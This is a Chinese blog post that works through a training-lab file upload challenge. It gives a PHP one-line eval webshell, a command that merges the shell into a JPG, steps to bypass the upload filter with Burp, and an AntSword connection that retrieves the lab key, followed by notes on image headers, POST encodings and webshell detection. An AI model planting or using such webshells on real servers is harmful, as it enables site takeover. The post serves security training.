

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Sinky">
  <meta name="keywords" content="">
  
    <meta name="description" content="背景介绍某部门为了方便内部人员上传聚餐的活动图片，在某服务器上新增的图片上传功能在被安全工程师”墨者”检测发现漏洞后，程序员做了修复，【上一次漏洞地址】。”墨者”负责对修复后的系统做复测，然而发现还是存在高危漏洞。 实训目标  掌握常见图片类型的文件头内容； 掌握表单数据通过POST提交数据时，对数据的修改方法； 了解WebShell是什么及其作用； 了解PHP程序的WebShell脚本的执行原理">
<meta property="og:type" content="article">
<meta property="og:title" content="WebShell文件上传漏洞分析溯源(第3题)">
<meta property="og:url" content="https://sinky.top/2022/11/02/WebShell%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E6%BA%AF%E6%BA%90(%E7%AC%AC3%E9%A2%98)/index.html">
<meta property="og:site_name" content="Sinky&#39;s Blog">
<meta property="og:description" content="背景介绍某部门为了方便内部人员上传聚餐的活动图片，在某服务器上新增的图片上传功能在被安全工程师”墨者”检测发现漏洞后，程序员做了修复，【上一次漏洞地址】。”墨者”负责对修复后的系统做复测，然而发现还是存在高危漏洞。 实训目标  掌握常见图片类型的文件头内容； 掌握表单数据通过POST提交数据时，对数据的修改方法； 了解WebShell是什么及其作用； 了解PHP程序的WebShell脚本的执行原理">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2022-11-02T03:29:18.354Z">
<meta property="article:modified_time" content="2022-11-02T07:18:33.796Z">
<meta property="article:author" content="Sinky">
<meta property="article:tag" content="墨者学院">
<meta property="article:tag" content="文件上传">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>WebShell文件上传漏洞分析溯源(第3题) - Sinky&#39;s Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"sinky.top","root":"/","version":"1.9.2","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.2.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
<link rel="alternate" href="/atom.xml" title="Sinky's Blog" type="application/atom+xml">
</head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Sinky</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                Categories
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                About
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="WebShell文件上传漏洞分析溯源(第3题)"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2022-11-02 11:29" pubdate>
          November 2, 2022 am
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          2.6k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          22 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">WebShell文件上传漏洞分析溯源(第3题)</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="背景介绍"><a href="#背景介绍" class="headerlink" title="背景介绍"></a>背景介绍</h1><p>某部门为了方便内部人员上传聚餐的活动图片，在某服务器上新增的图片上传功能在被安全工程师”墨者”检测发现漏洞后，程序员做了修复，【上一次漏洞地址】。”墨者”负责对修复后的系统做复测，然而发现还是存在高危漏洞。</p>
<p>实训目标</p>
<ol>
<li>掌握常见图片类型的文件头内容；</li>
<li>掌握表单数据通过POST提交数据时，对数据的修改方法；</li>
<li>了解WebShell是什么及其作用；</li>
<li>了解PHP程序的WebShell脚本的执行原理；</li>
</ol>
<p>解题方向</p>
<p>绕过页面对可执行文件上传的限制，利用WebShell读取服务器上的源代码内容。</p>
<h1 id="解题"><a href="#解题" class="headerlink" title="解题"></a>解题</h1><p>随便上传一个图片，返回信息为：文件上传成功，保存于：uploads/王也1.jpg</p>
<p>制作一句话图片木马</p>
<pre><code class="hljs">&lt;?php @eval($_POST['woshimuma']); ?&gt;
</code></pre>
<p>新建文件下一句话，在其下存入木马文件2.php和图片1.jpg,在该目录下打开cmd</p>
<pre><code class="hljs">copy 1.jpg/b+2.php muma.jpg
</code></pre>
<p>生成一句话图片木马，上传，bp拦截，修改<code>muma.jpg</code>后缀为php。</p>
<p>上传成功，得到路径，使用蚁剑连接。</p>
<p>蚁剑连接成功：<br>（图床又有毛病了，直接手打吧）</p>
<figure class="highlight awk"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs awk">url地址： ip:端口<span class="hljs-regexp">/uploads/mum</span>a.php<br>连接密码： woshimuma1<br>编码设置： UTF8<br>连接类型： PHP<br></code></pre></td></tr></tbody></table></figure>

<p>找到key: <code>mozheece9dc52403a1a5249a9075e4de</code></p>
<h1 id="拓展"><a href="#拓展" class="headerlink" title="拓展"></a>拓展</h1><h2 id="常见图片的头文件格式"><a href="#常见图片的头文件格式" class="headerlink" title="常见图片的头文件格式"></a>常见图片的头文件格式</h2><ol>
<li><code>.jpeg</code><ol>
<li>文件头标识 (2 bytes): 0XFF, 0XD8 (SOI)</li>
<li>文件结束标识 (2 bytes): 0XFF, 0XD9 (EOI)</li>
</ol>
</li>
<li><code>.png</code><ol>
<li>文件头标识 (8 bytes)：0X89 0X50 0X4E 0X47 0X0D 0X0A 0X1A 0X0A</li>
</ol>
</li>
<li><code>.bmp</code><ol>
<li>文件头标识 (2 bytes)：0X42 0X4D</li>
</ol>
</li>
<li><code>.gif</code><ol>
<li>文件头标识 (6 bytes)0X47 0X49 0X46 0X38 0X39(37) 0X61        G I F 8 9 (7) a</li>
</ol>
</li>
<li><code>.tiff</code><ol>
<li>文件头标识 (2 bytes) 0X4D 0X4D 或 0X49 0X49</li>
</ol>
</li>
</ol>
<h2 id="Form表单、四种常见的POST请求提交数据方式"><a href="#Form表单、四种常见的POST请求提交数据方式" class="headerlink" title="Form表单、四种常见的POST请求提交数据方式"></a>Form表单、四种常见的POST请求提交数据方式</h2><h3 id="浏览器行为：Form表单提交"><a href="#浏览器行为：Form表单提交" class="headerlink" title="浏览器行为：Form表单提交"></a>浏览器行为：Form表单提交</h3><ol>
<li>form表单常用属性<ol>
<li>action: url地址，服务器接收表单数据的地址</li>
<li>method: 提交服务器的http方法，一般为post和get</li>
<li>name: 唯一性</li>
<li>enctype: 表单数据提交时使用的编码类型，默认使用<code>pplication/x-www-form-urlencoded</code>,如果使用post请求，则请求头中的content-type指定值就是该值，如果表单中有上传文件，编码类型需要使用<code>multipart/form-data</code>类型，才能完成传递文件数据。</li>
</ol>
</li>
</ol>
<p>enctype为form表单数据的编码格式，Content-type为Http传输的数据的编码格式。</p>
<ol start="2">
<li>浏览器提交表单时，会执行如下步骤<ol>
<li>识别出表单中表单元素的有效项，作为提交项</li>
<li>构建一个表单数据集</li>
<li>根据form表单中的enctype属性的值作为content-type对数据进行编码</li>
<li>根据form表单中的action属性和method属性向指定的地址发送数据</li>
</ol>
</li>
<li>提交方式<ol>
<li>get: 表单数据会被encodeURIComponent后以参数的形式：name=value&amp;name2=value2附带在url?后面，再发送给服务器，并在url中显示出来。</li>
<li>post: enctype默认<code>application/x-www-form-urlencoded</code>对表单数据进行编码，数据以键值对在http请求体重发送给服务器，如果enctype属性为<code>multipart/form-data</code>,则以消息的形式发送给服务器。</li>
</ol>
</li>
</ol>
<h3 id="Post请求下的Content-Type类型（编码类型）"><a href="#Post请求下的Content-Type类型（编码类型）" class="headerlink" title="Post请求下的Content-Type类型（编码类型）"></a>Post请求下的Content-Type类型（编码类型）</h3><ul>
<li>application/x-www-form-urlencoded</li>
</ul>
<p>浏览器的原生 <code>&lt;form&gt;</code> 表单，如果不设置 <code>enctype </code>属性，那么最终就会以 <code>application/x-www-form-urlencoded </code>方式提交数据。请求类似于下面这样:</p>
<pre><code class="hljs">POST http://www.example.com HTTP/1.1
Content-Type: application/x-www-form-urlencoded;charset=utf-8

title=test&amp;sub%5B%5D=1&amp;sub%5B%5D=2&amp;sub%5B%5D=3
</code></pre>
<p><code>Content-Type</code> 被指定为 <code>application/x-www-form-urlencoded</code>；其次，提交的数据按照 <code>key1=val1&amp;key2=val2</code> 的方式进行编码，key 和 val 都进行了 URL 转码。</p>
<ul>
<li>multipart/form-data</li>
</ul>
<p>使用表单上传文件时，必须让<code> &lt;form&gt;</code> 表单的 enctype 等于 multipart/form-data。</p>
<ul>
<li>application/json</li>
<li>text/xml: 一种使用 HTTP 作为传输协议，XML 作为编码方式的远程调用规范</li>
</ul>
<p>相比之下，get方式的数据提交方式（编码方式）只有一种，就是application/x-www-form-urlencoding</p>
<h2 id="webshell"><a href="#webshell" class="headerlink" title="webshell"></a>webshell</h2><p><code>webshell</code>是网页后门，本质上是一种网页文件，一般由asp,php,jsp,asp.net等语言开发，<code>shell</code>的含义是取得对服务器某种程度上操作命令。常见的webshell有小马，大马，一句话木马</p>
<h4 id="作用"><a href="#作用" class="headerlink" title="作用"></a>作用</h4><ol>
<li>webshell被站长常用于网站管理、服务器管理等。根据FSO权限不同，作用有在线编辑网页脚本、上传下载文件、查看数据库、执行任意程序命令等。</li>
<li>被入侵者利用，从而达到控制网站服务器的目的。</li>
</ol>
<h3 id="webshell常见检测方式"><a href="#webshell常见检测方式" class="headerlink" title="webshell常见检测方式"></a>webshell常见检测方式</h3><ul>
<li>静态检测：通过匹配特征码、特征值、危险函数来查找webshell，但只能查找已知的webshell，主流的检测方法有关键字检查、审核代码逻辑等。速度快、对已知的webshell查找准确率高；误报率高，存在漏报，会被绕过。</li>
<li>动态监测： webshell在执行时表现出来的特征，我们称为动态特征。准确性高，但耗时、占用资源多</li>
</ul>
<p>主流的检测方法有文件状态对比(File Info Comparison)、运行特征(Feature Matching)、访问行为检测(Access Behavior)等。</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E5%A2%A8%E8%80%85%E5%AD%A6%E9%99%A2/">#墨者学院</a>
      
        <a href="/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/">#文件上传</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>WebShell文件上传漏洞分析溯源(第3题)</div>
      <div>https://sinky.top/2022/11/02/WebShell文件上传漏洞分析溯源(第3题)/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Author</div>
          <div>Sinky</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>November 2, 2022</div>
        </div>
      
      
      <div class="license-meta-item">
        <div>Licensed under</div>
        <div>
          
            
            
              <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
              <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                <i class="iconfont icon-by"></i>
              </span>
              </a>
            
          
        </div>
      </div>
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/11/02/Linux18%E4%B8%8B%E6%90%AD%E5%BB%BApwn%E7%8E%AF%E5%A2%83/" title="Linux18下搭建PWN环境">
                        <span class="hidden-mobile">Linux18下搭建PWN环境</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;Table of Contents</p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      headingSelector : CONFIG.toc.headingSelector || 'h1,h2,h3,h4,h5,h6',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      collapseDepth   : CONFIG.toc.collapseDepth || 0,
      scrollSmooth    : true,
      headingsOffset  : -boardTop
    });
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.10/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
